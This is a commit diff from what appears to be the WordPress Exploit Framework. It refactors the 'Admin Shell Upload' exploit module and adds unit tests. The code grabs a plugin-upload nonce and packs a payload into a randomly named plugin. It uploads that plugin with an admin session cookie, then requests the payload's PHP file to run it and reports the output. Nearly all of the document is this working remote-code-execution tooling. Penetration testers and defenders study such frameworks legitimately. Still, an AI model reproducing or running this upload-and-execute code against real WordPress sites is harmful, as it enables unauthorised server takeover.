Abstract generic payload plugin upload code

rastating · rastating · commit 19197c442ce4 · 2018-01-11T23:27:55.000Z
diff --git a/lib/wpxf/wordpress/plugin.rb b/lib/wpxf/wordpress/plugin.rb
@@ -7,9 +7,12 @@ module Wpxf::WordPress::Plugin
   # @return [String, nil] the nonce, nil on error.
   def wordpress_plugin_upload_nonce(cookie)
     res = execute_get_request(url: wordpress_url_plugin_upload, cookie: cookie)
-    if res && res.code == 200
+
+    if res&.code == 200
       return res.body[/id="_wpnonce" name="_wpnonce" value="([a-z0-9]+)"/i, 1]
     end
+
+    nil
   end
 
   # Create and upload a plugin that encapsulates the current payload.
@@ -22,11 +25,29 @@ def wordpress_upload_payload_plugin(name, payload_name, cookie)
     return false if nonce.nil?
 
     res = wordpress_upload_plugin(name, payload_name, cookie, nonce)
-    if res && res.code == 200
-      return true
-    else
-      return false
+    res&.code == 200
+  end
+
+  # Upload and execute a payload as a plugin.
+  # @param plugin_name [String] the name of the plugin.
+  # @param payload_name [String] the name the payload should use on the server.
+  # @param cookie [String] a valid admin session cookie.
+  # @return [HttpResponse, nil] the {Wpxf::Net::HttpResponse} of the request.
+  def wordpress_upload_and_execute_payload_plugin(plugin_name, payload_name, cookie)
+    unless wordpress_upload_payload_plugin(plugin_name, payload_name, cookie)
+      emit_error 'Failed to upload the payload'
+      return nil
     end
+
+    payload_url = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php")
+    emit_info "Executing the payload at #{payload_url}..."
+    res = execute_get_request(url: payload_url)
+
+    if res&.code == 200 && !res.body.strip.empty?
+      emit_success "Result: #{res.body}"
+    end
+
+    res
   end
 
   # Generate a valid WordPress plugin header / base file.
diff --git a/modules/exploits/admin_shell_upload.rb b/modules/exploits/admin_shell_upload.rb
@@ -11,65 +11,37 @@ def initialize
 
     update_info(
       name: 'Admin Shell Upload',
-      desc: 'This module will generate a plugin, pack the payload into it and '\
-            'upload it to a server running WordPress; providing valid admin '\
-            'credentials are used.',
-      author: ['Rob Carr <rob[at]rastating.com>'],
+      desc: %(
+        This module will generate a plugin, pack the payload into it and
+        upload it to a server running WordPress; providing valid admin
+        credentials are used.
+      ),
+      author: [
+        'rastating'
+      ],
       date: 'Feb 21 2015'
     )
-
-    register_options([
-      StringOption.new(
-        name: 'username',
-        desc: 'The WordPress username to authenticate with',
-        required: true
-      ),
-      StringOption.new(
-        name: 'password',
-        desc: 'The WordPress password to authenticate with',
-        required: true
-      )
-    ])
   end
 
-  def username
-    normalized_option_value('username')
-  end
-
-  def password
-    normalized_option_value('password')
+  def check
+    return :vulnerable if wordpress_and_online?
+    :unknown
   end
 
-  def check
-    if wordpress_and_online?
-      return :vulnerable
-    else
-      return :unknown
-    end
+  def requires_authentication
+    true
   end
 
   def run
     return false unless super
 
-    cookie = authenticate_with_wordpress(username, password)
-    return false unless cookie
-
     emit_info 'Uploading payload...'
-    plugin_name = Utility::Text.rand_alpha(10)
-    payload_name = Utility::Text.rand_alpha(10)
-    unless wordpress_upload_payload_plugin(plugin_name, payload_name, cookie)
-      emit_error 'Failed to upload the payload'
-      return false
-    end
-
-    payload_url = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php")
-    emit_info "Executing the payload at #{payload_url}..."
-    res = execute_get_request(url: payload_url)
-
-    if res && res.code == 200 && !res.body.strip.empty?
-      emit_success "Result: #{res.body}"
-    end
+    res = wordpress_upload_and_execute_payload_plugin(
+      Utility::Text.rand_alpha(10),
+      Utility::Text.rand_alpha(10),
+      session_cookie
+    )
 
-    true
+    !res.nil?
   end
 end
diff --git a/spec/wordpress/plugin_spec.rb b/spec/wordpress/plugin_spec.rb
@@ -89,4 +89,37 @@
       expect(res).to be false
     end
   end
+
+  describe '#wordpress_upload_and_execute_payload_plugin' do
+    context 'when the plugin fails to upload' do
+      it 'returns nil' do
+        res = subject.wordpress_upload_and_execute_payload_plugin('', '', '')
+        expect(res).to be_nil
+      end
+    end
+
+    context 'when the execution returns status 200' do
+      let(:code) { 200 }
+      let(:body) { 'res content' }
+      it 'emits the response content' do
+        allow(subject).to receive(:wordpress_upload_payload_plugin).and_return true
+
+        emitted_content = false
+        allow(subject).to receive(:emit_success) do |p1|
+          emitted_content = p1 == 'Result: res content'
+        end
+
+        subject.wordpress_upload_and_execute_payload_plugin('', '', '')
+        expect(emitted_content).to be true
+      end
+    end
+
+    context 'when the payload is executed' do
+      it 'returns the HttpResponse of the payload request' do
+        allow(subject).to receive(:wordpress_upload_payload_plugin).and_return true
+        res = subject.wordpress_upload_and_execute_payload_plugin('', '', '')
+        expect(res).to be_kind_of Wpxf::Net::HttpResponse
+      end
+    end
+  end
 end
